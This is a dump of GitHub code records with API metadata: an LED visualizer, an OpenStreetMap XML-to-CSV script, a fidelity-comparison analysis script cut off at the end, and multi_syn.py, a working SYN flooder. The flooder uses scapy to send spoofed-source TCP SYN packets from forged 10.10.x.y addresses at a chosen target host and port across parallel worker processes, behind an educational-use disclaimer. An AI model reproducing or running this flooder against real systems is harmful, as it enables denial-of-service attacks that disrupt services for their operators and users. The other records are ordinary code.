"attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 70, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 70, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.mkfifo", "line_number": 79, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 84, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 103, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 103, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 133, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 150, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 169, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 194, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 205, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 208, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "23408140196", "text": "import 
ImageGrab\nimport serial\nimport sys\nimport pyaudio\nimport time\nimport wave\nimport audioop\n\nr_sum = 0\ng_sum = 0\nb_sum = 0\n\nser = serial.Serial('COM5')\np = pyaudio.PyAudio()\n\n#\"Stereo Mix\" must be enabled in windows settings. input_device_index = the Stereo Mix index\n#format,rate, etc. are dependent on sound card and desired settings\nstream = p.open(format=pyaudio.paInt16, channels=2, rate=30000,\n\t\tinput=True, frames_per_buffer=2048, input_device_index=1)\n\nwhile True:\n\n\t'''RGB'''\n\t#grab screen and get bounding box\n\timage = ImageGrab.grab()\n\tpixels = image.load()\n\tbbox = image.getbbox()\n\t#iterate over pixels in screen\n\tfor y in range(0, bbox[3]-10, 10):\n\t\tfor x in range(0, bbox[2]-10, 10):\n\t\t\t#sum rgb values\n\t\t\tr_sum = r_sum + pixels[x,y][0]\n\t\t\tg_sum = g_sum + pixels[x,y][1]\n\t\t\tb_sum = b_sum + pixels[x,y][2]\n\t\n\t'''AUDIO'''\n\t#get 2048 frames and calculate \"RMS\" (a measure of volume)\n\tdata = stream.read(2048)\n\tvol = audioop.rms(data, 2)\n\t#map RMS volume values to (0,255) brightness level for LEDs\n\tvol_mapped = (int)((float(vol) / float(3000)) * 255)\n\tif vol_mapped > 255:\n\t\tvol_mapped = 255\n\t\t\n\t'''SERIAL'''\n\t#send data to serial as bytes (chars)\n\tser.write('R') # start byte\n\t#averages for r, g, and b, then audio volume\n\tser.write(chr(r_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(g_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(b_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(vol_mapped))\n\n\t#reset sums\n\tr_sum = 0\n\tg_sum = 0\n\tb_sum = 0\n\ttime.sleep(.01)\n", "repo_name": "amkram/led-visualizer-thing", "sub_path": "py/rgb.py", "file_name": "rgb.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "serial.Serial", "line_number": 13, "usage_type": "call"}, {"api_name": "pyaudio.PyAudio", "line_number": 14, "usage_type": "call"}, {"api_name": "pyaudio.paInt16", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ImageGrab.grab", "line_number": 25, "usage_type": "call"}, {"api_name": "audioop.rms", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "27154629689", "text": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nNote: This code was provided by Udacity during Quiz #11 of the \"Case Study\"\r\nin the \"Data Wrangling\" course, except for calls to clean the data\r\n\r\nThe code reads the Open Street Map data file nodes, ways, and relations,\r\nwhich are transformed into dictionaries of dictionaries.\r\n\r\nThe process for this transformation is as follows:\r\n- Use iterparse to iteratively step through each top level element in the XML\r\n- Shape each element into several data structures using a custom function\r\n- Utilize a schema and validation library to ensure the transformed data is in the correct format\r\n- Write each data structure to the appropriate .csv files\r\n\r\n\r\nWe've already provided the code needed to load the data, perform iterative parsing and write the\r\noutput to csv files. Your task is to complete the shape_element function that will transform each\r\nelement into the correct format. To make this process easier we've already defined a schema (see\r\nthe schema.py file in the last code tab) for the .csv files and the eventual tables. Using the
Using the\r\ncerberus library we can validate the output against this schema to ensure it is correct.\r\n\r\n### If the element top level tag is \"node\":\r\n\r\nThe dictionary returned should have the format {\"node\": .., \"node_tags\": ...}\r\n\r\nThe \"node\" field should hold a dictionary of the following top level node attributes:\r\n- id\r\n- user\r\n- uid\r\n- version\r\n- lat\r\n- lon\r\n- timestamp\r\n- changeset\r\n\r\nAll other attributes can be ignored\r\n\r\nThe \"node_tags\" field should hold a list of dictionaries, one per secondary tag. Secondary tags are\r\nchild tags of node which have the tag name/type: \"tag\". Each dictionary should have the following\r\nfields from the secondary tag attributes:\r\n\r\n- id: the top level node id attribute value\r\n- key: the full tag \"k\" attribute value if no colon is present or the characters after the colon if one is.\r\n- value: the tag \"v\" attribute value\r\n- type: either the characters before the colon in the tag \"k\" value or \"regular\" if a colon is not present.\r\n\r\nAdditionally,\r\n\r\n- if the tag \"k\" value contains problematic characters, the tag should be ignored\r\n- if the tag \"k\" value contains a \":\" the characters before the \":\" should be set as the tag type\r\n and characters after the \":\" should be set as the tag key\r\n- if there are additional \":\" in the \"k\" value they and they should be ignored and kept as part of\r\n the tag key. For example:\r\n\r\n <tag k=\"addr:street:name\" v=\"Lincoln\"/>\r\n should be turned into\r\n {'id': 12345, 'key': 'street:name', 'value': 'Lincoln', 'type': 'addr'}\r\n\r\n- If a node has no secondary tags then the \"node_tags\" field should just contain an empty list.\r\n\r\nThe final return value for a \"node\" element should look something like:\r\n\r\n{'node': {'id': 757860928,\r\n 'user': 'uboot',\r\n 'uid': 26299,\r\n 'version': '2',\r\n 'lat': 41.9747374,\r\n 'lon': -87.6920102,\r\n 'timestamp': '2010-07-22T16:16:51Z',\r\n 'changeset': 5288876},\r\n 'node_tags': [{'id': 757860928,\r\n 'key': 'amenity',\r\n 'value': 'fast_food',\r\n 'type': 'regular'},\r\n {'id': 757860928,\r\n 'key': 'cuisine',\r\n 'value': 'sausage',\r\n 'type': 'regular'},\r\n {'id': 757860928,\r\n 'key': 'name',\r\n 'value': \"Shelly's Tasty Freeze\",\r\n 'type': 'regular'}]}\r\n\r\n### If the element top level tag is \"way\":\r\n\r\nThe dictionary should have the format {\"way\": ..., \"way_tags\": ..., \"way_nodes\": ...}\r\n\r\nThe \"way\" field should hold a dictionary of the following top level way attributes:\r\n- id\r\n- user\r\n- uid\r\n- version\r\n- timestamp\r\n- changeset\r\n\r\nAll other attributes can be ignored\r\n\r\nThe \"way_tags\" field should again hold a list of dictionaries, following the exact same rules as for \"node_tags\".\r\n\r\nAdditionally, the dictionary should have a field \"way_nodes\". \"way_nodes\" should hold a list of\r\ndictionaries, one for each nd child tag. Each dictionary should have the fields:\r\n- id: the top level element (way) id\r\n- node_id: the ref attribute value of the nd tag\r\n- position: the index starting at 0 of the nd tag i.e. 
what order the nd tag appears within the way element\r\n\r\nThe final return value for a \"way\" element should look something like:\r\n\r\n{'way': {'id': 209809850,\r\n 'user': 'chicago-buildings',\r\n 'uid': 674454,\r\n 'version': '1',\r\n 'timestamp': '2013-03-13T15:58:04Z',\r\n 'changeset': 15353317},\r\n 'way_nodes': [{'id': 209809850, 'node_id': 2199822281, 'position': 0},\r\n {'id': 209809850, 'node_id': 2199822390, 'position': 1},\r\n {'id': 209809850, 'node_id': 2199822392, 'position': 2},\r\n {'id': 209809850, 'node_id': 2199822369, 'position': 3},\r\n {'id': 209809850, 'node_id': 2199822370, 'position': 4},\r\n {'id': 209809850, 'node_id': 2199822284, 'position': 5},\r\n {'id': 209809850, 'node_id': 2199822281, 'position': 6}],\r\n 'way_tags': [{'id': 209809850,\r\n 'key': 'housenumber',\r\n 'type': 'addr',\r\n 'value': '1412'},\r\n {'id': 209809850,\r\n 'key': 'street',\r\n 'type': 'addr',\r\n 'value': 'West Lexington St.'},\r\n {'id': 209809850,\r\n 'key': 'street:name',\r\n 'type': 'addr',\r\n 'value': 'Lexington'},\r\n {'id': '209809850',\r\n 'key': 'street:prefix',\r\n 'type': 'addr',\r\n 'value': 'West'},\r\n {'id': 209809850,\r\n 'key': 'street:type',\r\n 'type': 'addr',\r\n 'value': 'Street'},\r\n {'id': 209809850,\r\n 'key': 'building',\r\n 'type': 'regular',\r\n 'value': 'yes'},\r\n {'id': 209809850,\r\n 'key': 'levels',\r\n 'type': 'building',\r\n 'value': '1'},\r\n {'id': 209809850,\r\n 'key': 'building_id',\r\n 'type': 'chicago',\r\n 'value': '366409'}]}\r\n\"\"\"\r\n\r\nimport csv\r\nimport codecs\r\nimport re\r\nimport xml.etree.cElementTree as ET\r\n\r\nfrom open_street_clean import clean_tags\r\n\r\n# Regular expressions\r\nLOWER_COLON = re.compile(r'^([a-z]|_)+:([a-z]|_)+')\r\nPROBLEMCHARS = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. 
\\t\\r\\n]')\r\n\r\n# Make sure the fields order in the csvs matches the column order in the sql table schema\r\nNODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']\r\nNODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']\r\nWAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']\r\nWAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']\r\nWAY_NODES_FIELDS = ['id', 'node_id', 'position']\r\n\r\n\r\ndef shape_node(element, node_attr_fields=NODE_FIELDS, problem_chars=PROBLEMCHARS,\r\n default_tag_type ='regular'):\r\n \"\"\"\r\n Clean and shape node elements\r\n element = OSM XML element\r\n node_attr_fields = list of expected node attributes\r\n problem_chars = regular expression for keys we should ignore\r\n default_tag_type = indicate the type for a default key\r\n \"\"\"\r\n node_attribs = {}\r\n node_tags = []\r\n \r\n # Save attributes\r\n for field in node_attr_fields:\r\n node_attribs[field] = element.attrib[field]\r\n\r\n # Go through the element and save tags\r\n for node in element:\r\n # Clean the tags for this node\r\n cleaned_tag_key, cleaned_tag_value = clean_tags(node.attrib['k'], node.attrib['v'])\r\n \r\n if PROBLEMCHARS.match(cleaned_tag_key):\r\n continue\r\n\r\n tag_dict = {}\r\n tag_dict['id'] = element.attrib['id']\r\n tag_dict['value'] = cleaned_tag_value\r\n\r\n # Keys could contain a key and type\r\n if ':' in node.attrib['k']:\r\n tag_dict['key'] = cleaned_tag_key.split(':', 1)[-1]\r\n tag_dict['type'] = cleaned_tag_key.split(':', 1)[0]\r\n else:\r\n tag_dict['key'] = cleaned_tag_key\r\n tag_dict['type'] = default_tag_type\r\n node_tags.append(tag_dict)\r\n\r\n return {'node': node_attribs, 'node_tags': node_tags}\r\n\r\n\r\ndef shape_way(element, way_attr_fields=WAY_FIELDS, problem_chars=PROBLEMCHARS,\r\n default_tag_type='regular'):\r\n \"\"\"\r\n Clean and shape way elements\r\n element = OSM XML element\r\n way_attr_fields = list of expected way attributes\r\n problem_chars = regular expression for keys we should ignore\r\n default_tag_type = indicate the type for a default key\r\n \"\"\"\r\n way_attribs = {}\r\n way_nodes = []\r\n way_tags = []\r\n\r\n # Save attributes \r\n for field in way_attr_fields:\r\n way_attribs[field] = element.attrib[field]\r\n\r\n # Go through the element and save tags\r\n n = 0\r\n for node in element: \r\n # node links\r\n if node.tag == \"nd\":\r\n way_node = {}\r\n way_node['id'] = element.attrib['id']\r\n way_node['node_id'] = node.attrib['ref']\r\n way_node['position'] = n\r\n way_nodes.append(way_node)\r\n n += 1\r\n # tags\r\n elif node.tag == \"tag\":\r\n # Clean the tags for this node\r\n cleaned_tag_key, cleaned_tag_value = clean_tags(node.attrib['k'], node.attrib['v'])\r\n \r\n if PROBLEMCHARS.match(cleaned_tag_key):\r\n continue\r\n\r\n tag_dict = {}\r\n tag_dict['id'] = element.attrib['id']\r\n tag_dict['value'] = cleaned_tag_value\r\n\r\n if ':' in node.attrib['k']:\r\n tag_dict['key'] = cleaned_tag_key.split(':', 1)[-1]\r\n tag_dict['type'] = cleaned_tag_key.split(':', 1)[0]\r\n else:\r\n tag_dict['key'] = cleaned_tag_key\r\n tag_dict['type'] = default_tag_type\r\n way_tags.append(tag_dict) \r\n \r\n return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': way_tags}\r\n\r\n\r\ndef shape_element(element, node_attr_fields=NODE_FIELDS, way_attr_fields=WAY_FIELDS,\r\n problem_chars=PROBLEMCHARS, default_tag_type='regular'):\r\n\r\n \"\"\"Clean and shape node or way XML element to Python dict\"\"\"\r\n return_dict = {}\r\n\r\n # Process nodes\r\n if element.tag == 
'node':\r\n return_dict = shape_node(element)\r\n # Process way\r\n elif element.tag == 'way':\r\n return_dict = shape_way(element)\r\n\r\n return return_dict\r\n\r\n# ================================================== #\r\n\r\n# Helper Functions #\r\n\r\n# ================================================== #\r\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\r\n \"\"\"\r\n Yield element if it is the right type of tag\r\n osm_file = path to the OSM XML file\r\n tags = list of tags whose elements this shall yield\r\n \"\"\"\r\n context = ET.iterparse(osm_file, events=('start', 'end'))\r\n _, root = next(context)\r\n for event, elem in context:\r\n if event == 'end' and elem.tag in tags:\r\n yield elem\r\n root.clear()\r\n\r\n\r\nclass UnicodeDictWriter(csv.DictWriter, object):\r\n \"\"\"Extend csv.DictWriter to handle Unicode input\"\"\"\r\n def writerow(self, row):\r\n super(UnicodeDictWriter, self).writerow({\r\n #k:str(v).encode('utf-8') for k, v in row.items()\r\n k:v for k, v in row.items()\r\n })\r\n\r\n def writerows(self, rows):\r\n for row in rows:\r\n self.writerow(row)\r\n\r\n# ================================================== #\r\n\r\n# Main Function #\r\n\r\n# ================================================== #\r\n\r\ndef process_map(file_in, nodes_path, nodes_tags_path, ways_path, way_nodes_path, way_tags_path):\r\n \"\"\"\r\n Iteratively process each XML element and write to csv(s)\r\n file_in = XML OSM File\r\n \"\"\"\r\n \r\n # Operate on all output files (use codecs.open or regular open?)\r\n with codecs.open(nodes_path, 'w', encoding='utf-8') as nodes_file, \\\r\n codecs.open(nodes_tags_path, 'w', encoding='utf-8') as nodes_tags_file, \\\r\n codecs.open(ways_path, 'w', encoding='utf-8') as ways_file, \\\r\n codecs.open(way_nodes_path, 'w', encoding='utf-8') as way_nodes_file, \\\r\n codecs.open(way_tags_path, 'w', encoding='utf-8') as way_tags_file:\r\n\r\n nodes_writer = UnicodeDictWriter(nodes_file, NODE_FIELDS, lineterminator = '\\n')\r\n node_tags_writer = UnicodeDictWriter(nodes_tags_file, NODE_TAGS_FIELDS, lineterminator = '\\n')\r\n ways_writer = UnicodeDictWriter(ways_file, WAY_FIELDS, lineterminator = '\\n')\r\n way_nodes_writer = UnicodeDictWriter(way_nodes_file, WAY_NODES_FIELDS, lineterminator = '\\n')\r\n way_tags_writer = UnicodeDictWriter(way_tags_file, WAY_TAGS_FIELDS, lineterminator = '\\n')\r\n \r\n # nodes_writer.writeheader() Skip headers due to sqlite3 insertion error on primary key\r\n node_tags_writer.writeheader()\r\n # ways_writer.writeheader() Skip headers due to sqlite3 insertion error on primary key\r\n way_nodes_writer.writeheader()\r\n way_tags_writer.writeheader()\r\n\r\n # Loop through the node and way elements\r\n for element in get_element(file_in, tags=('node', 'way')):\r\n el = shape_element(element)\r\n if el:\r\n \r\n if element.tag == 'node':\r\n nodes_writer.writerow(el['node'])\r\n node_tags_writer.writerows(el['node_tags'])\r\n \r\n elif element.tag == 'way':\r\n ways_writer.writerow(el['way'])\r\n way_nodes_writer.writerows(el['way_nodes'])\r\n way_tags_writer.writerows(el['way_tags'])\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # CSV Sample Output File Names\r\n NODES_PATH_SAMPLE = \"nodes_sample.csv\"\r\n NODES_TAGS_PATH_SAMPLE = \"nodes_tags_sample.csv\"\r\n WAYS_PATH_SAMPLE = \"ways_sample.csv\"\r\n WAY_NODES_PATH_SAMPLE = \"ways_nodes_sample.csv\"\r\n WAY_TAGS_PATH_SAMPLE = \"ways_tags_sample.csv\"\r\n\r\n # Process sample data set\r\n process_map('philadelphia_pennsylvania_sample.osm',\r\n 
NODES_PATH_SAMPLE, NODES_TAGS_PATH_SAMPLE,\r\n WAYS_PATH_SAMPLE, WAY_NODES_PATH_SAMPLE, WAY_TAGS_PATH_SAMPLE)\r\n \r\n # CSV Full Output File Names\r\n NODES_PATH_FULL = \"nodes.csv\"\r\n NODES_TAGS_PATH_FULL = \"nodes_tags.csv\"\r\n WAYS_PATH_FULL = \"ways.csv\"\r\n WAY_NODES_PATH_FULL = \"ways_nodes.csv\"\r\n WAY_TAGS_PATH_FULL = \"ways_tags.csv\"\r\n \r\n # Process full data set\r\n process_map('philadelphia_pennsylvania.osm',\r\n NODES_PATH_FULL, NODES_TAGS_PATH_FULL,\r\n WAYS_PATH_FULL, WAY_NODES_PATH_FULL, WAY_TAGS_PATH_FULL)", "repo_name": "William-McKee/udacity-data-analyst", "sub_path": "Open_Street_Map/open_street_process_map.py", "file_name": "open_street_process_map.py", "file_ext": "py", "file_size_in_byte": 14822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "re.compile", "line_number": 166, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 167, "usage_type": "call"}, {"api_name": "open_street_clean.clean_tags", "line_number": 196, "usage_type": "call"}, {"api_name": "open_street_clean.clean_tags", "line_number": 248, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree.iterparse", "line_number": 294, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "csv.DictWriter", "line_number": 302, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 327, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 328, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 329, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 330, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 331, "usage_type": "call"}]} +{"seq_id": "15396028939", "text": "#!/usr/bin/env python3\r\n\r\n\"\"\"Simple SYN Flooder and spoofer\r\n - @mjdubell\r\n\r\nThis software is intended for educational purposes and\r\ncan only be used against systems with permission from owner.\r\nThe user is the only one responsible for any damages. 
By using this\r\nsoftware you agree with the terms.\r\n\r\nUsage:\r\n multi_syn.py <dst_ip> <dst_port> [--workers=<amount>] [--sleep=<seconds>]\r\n\r\nOptions:\r\n -h, --help Show this screen.\r\n --version Show version.\r\n --workers=<amount> Amount of processes to use [default: 4].\r\n --sleep=<seconds> How many seconds to sleep between scans [default: 0].\r\n\r\n\"\"\"\r\nfrom docopt import docopt\r\nimport logging\r\nimport sys\r\nfrom multiprocessing import Process, current_process\r\nimport signal\r\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\r\nfrom scapy.all import *\r\n\r\n\r\ndef flood(src_net: str, dst_ip: str, dst_port: int, sleep: int):\r\n # the actual code that will be sending SYN packets\r\n for src_host in range(1, 254):\r\n for src_port in range(1024, 65535):\r\n # Build the packet\r\n src_ip = f\"{src_net}.{src_host}\"\r\n network_layer = IP(src=src_ip, dst=dst_ip)\r\n transport_layer = TCP(sport=src_port, dport=dst_port, flags=\"S\")\r\n\r\n # Send the packet\r\n try:\r\n send(network_layer/transport_layer, verbose=False)\r\n except Exception as e:\r\n print(f\"[-] Something went terribly wrong: {e}\")\r\n sys.exit()\r\n\r\n if sleep != 0:\r\n time.sleep(sleep)\r\n\r\n\r\ndef signal_handler(signal, frame):\r\n print(f\"\\n[-] CTRL+C, quitting...\")\r\n sys.exit(0)\r\n\r\n\r\ndef main(arguments):\r\n dst_ip = arguments[\"<dst_ip>\"]\r\n dst_port = int(arguments[\"<dst_port>\"])\r\n workers = int(arguments[\"--workers\"])\r\n sleep = int(arguments[\"--sleep\"])\r\n \r\n signal.signal(signal.SIGINT, signal_handler)\r\n\r\n if workers < 1:\r\n print(\"[-] You need at least 1 worker...\")\r\n sys.exit()\r\n\r\n print(\"[!] Starting Syn Flooder...\")\r\n print(f\"[~] Workers: {workers}\")\r\n print(f\"[~] Target IP: {dst_ip}\")\r\n\r\n processes = []\r\n for worker in range(1, workers+1):\r\n src_net = f\"10.10.{worker}\"\r\n p = Process(target=flood, args=(src_net, dst_ip, dst_port, sleep), daemon=True)\r\n processes.append(p)\r\n p.start()\r\n\r\n for process in processes:\r\n if process is not None:\r\n process.join()\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n arguments = docopt(__doc__, version=\"Multi SYN Flooder 1.0\")\r\n main(arguments)\r\n", "repo_name": "dubs3c/SYN-Flooder", "sub_path": "multi_syn.py", "file_name": "multi_syn.py", "file_ext": "py", "file_size_in_byte": 2596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 61, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 74, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "31183891915", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 10 17:13:28 2021\nCompare flipped and non-flipped (weights signed or not) cross-resolution exponent analysis results.\nLoad fidelity arrays made with crossParcellationResolutionAnalysisExponents.py.\n\n@author: rouhinen\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## Settings used in creating the 
plvArrays.\nresolutions = ['100', '200', '400', '597', '775', '942']\nexponents = [0, 1, 2, 4, 8, 16, 32]\n\n\n\"\"\" Load PLV arrays from files. \"\"\"\nplvArray_meth1_u = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Unsigned\\\\plvArray_meth1.npy\")\nplvArray_meth2_u = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Unsigned\\\\plvArray_meth2m.npy\")\nplvArray_meth1_f = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Signed\\\\plvArray_meth1.npy\")\nplvArray_meth2_f = np.load(\"C:\\\\temp\\\\fWeighting\\\\numpyArrays\\\\plvArrays\\\\exponents0to32Signed\\\\plvArray_meth2m.npy\")\n\n\"\"\" Get relative fidelity means differences of flipped and unflipped. \"\"\"\ndef nonZeroMeans(zeroBufferedData, exponents, resolutions):\n \"\"\" zeroBufferedData shape: exponents x subjects x resolutions x resolutions x maxResolution. \"\"\"\n means = np.zeros((len(exponents), len(resolutions),len(resolutions)))\n for i1, resolution1 in enumerate(resolutions):\n for i2, resolution2 in enumerate(resolutions):\n for iexp, exponent in enumerate(exponents):\n nonZero = zeroBufferedData[iexp,:,i1,i2,:]\n nonZero = nonZero[nonZero != 0]\n means[iexp,i1,i2] = round(np.mean(nonZero), 4)\n return means\n\nmeans_meth1_u = nonZeroMeans(plvArray_meth1_u, exponents, resolutions) # Method 1 modeled resolution, non-flipped\nmeans_meth2_u = nonZeroMeans(plvArray_meth2_u, exponents, resolutions) # Method 2 modeled resolution, non-flipped\nmeans_meth1_f = nonZeroMeans(plvArray_meth1_f, exponents, resolutions) # Method 1 modeled resolution, flipped\nmeans_meth2_f = nonZeroMeans(plvArray_meth2_f, exponents, resolutions) # Method 2 modeled resolution, flipped\n\nmeans_meth1_r = means_meth1_u / means_meth1_f\nmeans_meth2_r = means_meth2_u / means_meth2_f\n\n\n\"\"\" Plot \"\"\"\n# Set global figure parameters, including CorelDraw compatibility (.fonttype)\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize':'7',\n 'figure.figsize':(2.0*len(exponents), 2.2),\n 'axes.labelsize':'7',\n 'axes.titlesize':'7',\n 'xtick.labelsize':'7',\n 'ytick.labelsize':'7',\n 'lines.linewidth':'0.5',\n 'font.family':'Arial',\n 'pdf.fonttype':42,\n 'ps.fonttype':42}\npylab.rcParams.update(params)\n\n\ndef heat_plot_exp(data, tickLabels, titleStrings, vmin=0.1, vmax=0.6, decimals=2, stripFirst0=False):\n # Data 3D, with first dimension sub-plots.\n columns = len(data)\n \n # Set a threshold where text should be black instead of white. \n middle = (vmax+vmin)/2\n textToKT = (vmax-vmin) * 0.15\n \n fig, ax = plt.subplots(1, columns)\n for i, datum in enumerate(data):\n ax[i].imshow(datum[::-1,:], cmap='seismic', vmin=vmin, vmax=vmax) # Visualize Y-axis down to up.\n \n # Show all ticks...\n ax[i].set_xticks(np.arange(len(tickLabels)))\n ax[i].set_yticks(np.arange(len(tickLabels)))\n # ... and label them with the respective list entries\n ax[i].set_xticklabels(tickLabels)\n ax[i].set_yticklabels(tickLabels[::-1]) # Reverse y-axis labels.\n \n # # Rotate the tick labels and set their alignment.\n # plt.setp(ax[i].get_xticklabels(), rotation=0, ha=\"right\",\n # rotation_mode=\"anchor\")\n \n # Loop over datum dimensions and create text annotations. 
Remove first character if stripFirst0=True.\n for ii in range(len(tickLabels)):\n for j in range(len(tickLabels)):\n value = round(datum[-ii-1, j], decimals)\n valueStr = str(value)[1:] if stripFirst0 == True else str(value) \n tcolor = \"w\" if np.abs(value-middle) > textToKT else \"k\" # Set text color to white if not near middle threshold, else to black.\n ax[i].text(j, ii, valueStr, ha=\"center\", va=\"center\", \n color=tcolor, fontsize=7)\n \n ax[i].set_title(titleStrings[i])\n ax[i].set_xlabel('Modeling resolution')\n ax[i].set_ylabel('Simulation resolution')\n \n fig.tight_layout()\n plt.show()\n\n\n# Method 1\nmaxDiffFromOne = np.max(np.abs([means_meth1_r, means_meth2_r])*100-100)\nvminR = -maxDiffFromOne\nvmaxR = maxDiffFromOne\n\nmeth1Strings = ['Unflipped/Flipped fidelity dif,\\nmethod1 (%), exponent ' + str(exponent) for exponent in exponents]\nheat_plot_exp(means_meth1_r*100-100, resolutions, meth1Strings, vmin=vminR, vmax=vmaxR, decimals=1)\n\n# Method 2\nmeth2Strings = ['Unflipped/Flipped fidelity dif,\\nmethod2 (%), exponent ' + str(exponent) for exponent in exponents]\nheat_plot_exp(means_meth2_r*100-100, resolutions, meth2Strings, vmin=vminR, vmax=vmaxR, decimals=1)\n\n\n\n## Means of relative all values, diagonal, upper and lower triangles without diagonal. \ndef means_withTriangles(data, resolutions, exponents, verbose=True):\n \"\"\" data : exponents x resolutions x resolutions. \n Output : 4 x resolutions, with first dimension means of whole array, upper triangle without \n diagonal indices, diagonal, and lower triangle without diagonal indices. \n Upper diagonal: higher modeling resolution than simulation resolution. \"\"\"\n decimals = 3\n mean_byExp = np.round([np.mean(means) for means in data], decimals)\n \n if verbose==True:\n for i, mean in enumerate(mean_byExp):\n print(f'Mean fidelity with exponent {exponents[i]} whole {mean}')\n \n # Upper, lower, diagonal means.\n iup = np.triu_indices(len(resolutions), 1) # Upper triangle without diagonal indices.\n idi = np.diag_indices(len(resolutions)) # Diagonal indices.\n ilo = np.tril_indices(len(resolutions), -1) # Lower triangle without diagonal indices.\n \n mean_byExp_up = np.round([np.mean(means[iup]) for means in data], decimals)\n mean_byExp_di = np.round([np.mean(means[idi]) for means in data], decimals)\n mean_byExp_lo = np.round([np.mean(means[ilo]) for means in data], decimals)\n \n if verbose==True:\n for i, mean_up in enumerate(mean_byExp_up):\n mean_di = mean_byExp_di[i]\n mean_lo = mean_byExp_lo[i]\n print(f'Mean fidelity with exponent {exponents[i]} upper {mean_up}, diagonal {mean_di}, lower {mean_lo}')\n \n return [mean_byExp, mean_byExp_up, mean_byExp_di, mean_byExp_lo]\n\nmeans_tri_meth1_rel = means_withTriangles(means_meth1_r, resolutions, exponents)\nmeans_tri_meth2_rel = means_withTriangles(means_meth2_r, resolutions, exponents)\n\n\n\n\n\n\n\n\n", "repo_name": "sanrou/fidelityWeighting", "sub_path": "compareFlippedAndUnflippedCrossResolutionFidelities.py", "file_name": "compareFlippedAndUnflippedCrossResolutionFidelities.py", "file_ext": "py", "file_size_in_byte": 6726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", 
